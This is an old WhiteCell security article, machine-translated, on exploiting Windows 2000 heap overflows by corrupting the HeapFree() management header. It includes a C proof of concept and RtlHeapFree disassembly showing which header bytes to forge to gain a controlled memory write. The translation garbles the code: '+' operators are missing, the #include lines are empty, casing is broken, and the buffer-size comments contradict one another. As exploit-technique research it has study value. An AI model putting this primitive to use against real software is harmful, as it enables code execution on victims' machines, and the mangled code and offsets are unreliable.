Another way to HEAP overflow under Windows (WSS-ARTICLES-02011)
Create time: 2002-05-30
Article attribute: original
Article Source:
http://www.whitecell.org/
Article submission:
Alert7 (sztcww_at_sina.com)
Another way to HEAP overflow under Windows (WSS-ARTICLES-02011)
Author: Ilsy
Email: Ilsy@whitecell.org
Homepage:
http://www.whitecell.org
Date: 2002-05-30
Thank you: Alert7, ISNO
There are not many articles under Windows, and ISNO wrote one, I have seen benefits, but the utilization method he implemented is
"Suppose we copy the contents of the BUF1, the content size of the copy exceeds the size of BUF1, that is, 16 bytes, will overflow
Out, if we covers the two 4-byte pointers, and the next assignment of BUF2, then the buf1 is released, then
Will write a 4-byte content into an address, and this content and address are we can control, so we can control
The process of functions turns to our shellcode ", I will describe another method of utilization, and it is also a little for ISNO's article.
supplement.
Under Windows, you can use free () to overflow to HEAP in Windows, using HeapAlloc () functions
I don't say the memory and images and structures after allocation, I can see ISNO documentation, after HEAPALLOC () is allocated, each piece
The memory has an 8-byte management area, and this management area should be the following:
0 4 5 6 8
Ominous | Field | Flags | ominous |
This 8 bytes are used for HeapFree, suppose we allocate 2 32-bytes of memory, and store up to 38 words to the first 32 bytes.
When the content is content, at this time, the 6 bytes of the second 32-byte memory management area are covered. If this 6 bytes are carefully designed, we
The flow of the program can be controlled.
The following code demonstrates 2 32-bytes of memory, an error occurs when calling HeapFree:
#include
#include
#include
#include
Int main (int Argc, char * argv [])
{
Handle hheap;
Char * buf1, * buf2;
// A 32-byte buffer
Char mybuf [] = "Aaaaaaaaaaaaaaaaaaaaaaaaaaaa";
// Assign memory in the default HEAP of the process
HHEAP = getProcessheap ();
// Assign two 32-byte memory
BUF1 = Heapalloc (HHEAP, 0, 32);
BUF2 = Heapalloc (HHEAP, 0, 32);
// Copy 32 bytes of MyBuf to 16 bytes of BUF1
STRCPY (BUF1, MyBUF);
/ / Change the management structure
MEMSET (BUF1 32, 0x99, 1);
MEMSET (BUF1 32 5, 0xFF, 1);
/ / Release memory
HeapFree (hheap, 0, buf1);
/ / Here will be wrong
HeapFree (HHEAP, 0, BUF2);
Return 0;
}
The memory image is like this before the program is not released in memory:
0 32 40
Aaaaaaaaaaaaaaaaaaaa | 0x99,0x00,0x05,0x00,0x00,0xff, 0xxx, 0xxx |
We can see that the top 6 bytes of the management area have been rewritten by us.
The first byte: must be greater than 0x80, we change to 0x99
The fourth byte: must be less than 0x40
The fifth bytes: the 0th and third bits must be set, for example, can be changed to 0x09, we change it here to 0xFF
We can analyze _rtlheapfree () disassembly code, you can know why you want to change this:
77FC9C97 MOV Al, Byte PTR [ESI 5]
77FC9C9A TEST Al, 1 // Check whether the 0th by one of the 5th bytes of the management area is set
77FC9C9C JE 77FC9019
77FC9CA2 TEST DL, 7
77FC9CA5 JNE 77FC9019
77FC9CAB CMP BYTE PTR [ESI 4], 40h // Check if the 4th byte of the management area is less than 0x40
77FC9CAF JAE 77FC9019
77FC9CB5 or DWORD PTR [EBP-4], 0FFH
77FC9CB9 MOV ECX, DWORD PTR [EDI 580H]
77FC9CBF Test ECX, ECX
77FC9CC1 JE 77FC9D03
77FC9CC3 CMP DWORD PTR [EDI 584H], 0
77FC9CCA JNE 77FC9D03
77FC9CCC Test Al, 8 // Check if the 0th by one of the 5th bytes of the management area is set
77FC9CCE JNE 77FC9D03
77FC9CD0 MOVZX EAX, Word PTR [ESI]
77FC9CD3 MOV DWORD PTR [EBP-30H], EAX
77FC9CD6 CMP EAX, 80H / / Check if the first byte of the management area is greater than 0x80
77FC9CDB JAE 77FC9D03 // We need to jump to this address
77FC9CDD PUSH EDX
77FC9CDE LEA EAX, [EAX EAX * 2]
77FC9CE1 SHL EAX, 4
77FC9CE4 Add Eax, ECX
77FC9CE6 PUSH EAX
77FC9CE7 CALL 77F89846
77FC9CEC TEST Al, Al, Al
77FC9CEE JE 77FC9D03
77FC9CF0 MOV Al, 1
77FC9CF2 MOV ECX, DWORD PTR [EBP-10H]
77FC9CF5 MOV DWORD PTR FS: [0], ECX
77FC9CFC POP EDI
77FC9CFD POP ESI
77FC9CFE POP EBX
77FC9CFF LEAVE
77FC9D00 RET 0CH
Compile the above code to run with the Release mode, pop up the following window: 0x77fca200 instructions are not referenced 0x41414141 memory cannot be Written.
What is this 41414141? We can find the following code with SoftICE tracking:
77fca1ef add esi, -18h // At this time, ESI points to the entrance to the management area, that is, BUF1-18H
(This 18 is not the same on different versions of Windows 2000, please processed according to different Windows 2000 versions), it is exactly what we can control.
77FCA1F2 MOV DWORD PTR [EBP-64H], ESI
77FCA1F5 MOV EAX, DWORD PTR [ESI]
77FCA1F7 MOV DWORD PTR [EBP-68H], EAX
77FCA1FA MOV ESI, DWORD PTR [ESI 4]
77FCA1FD MOV DWORD PTR [EBP-6CH], ESI
77FCA200 MOV DWORD PTR [ESI], EAX // Write Memory, an error
77FCA202 MOV DWORD PTR [EAX 4], ESI
With the foundation of the above, we can use the HeapFree () function, ^ _ ^
As for the writing of specific attack programs, please refer to ISNO's article "HEAP overflow under Windows", the method is the same.
WSS (WhiteCell Security Systems), a non-profit private technology organization, dedicated to various system safety techniques. Adhere to the traditional Hacker spirit, pursue the pureness of technology.
WSS Home:
http://www.whitecell.org/
WSS Forum:
http://www.whitecell.org/forum/
